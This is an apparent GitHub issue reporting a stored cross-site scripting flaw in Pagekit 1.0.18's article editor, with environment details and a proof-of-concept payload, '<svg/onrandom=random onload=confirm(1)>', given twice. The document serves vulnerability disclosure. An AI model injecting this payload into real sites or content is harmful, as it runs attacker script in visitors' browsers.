Skip to content
This repository has been archived by the owner on Dec 1, 2023. It is now read-only.

There is an XSS vulnerability in the place where the article is edited #968

Open
BreakALegCml opened this issue Jul 20, 2022 · 1 comment
Open

There is an XSS vulnerability in the place where the article is edited #968

BreakALegCml opened this issue Jul 20, 2022 · 1 comment

Comments

@BreakALegCml
Copy link

Problem

An attacker can insert a constructed statement into the article. When a user visits this page, it will trigger (XSS) cross site scripting attack

xss

EXP

<svg/onrandom=random onload=confirm(1)>
1
2

Technical Details

  • Pagekit version:1.0.18.
  • Webserver:apache2.4.39
  • Database:5.7.26
  • PHP Version:7.4.3
@BreakALegCml
Copy link
Author

##EXP
<svg/onrandom=random onload=confirm(1)>

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@BreakALegCml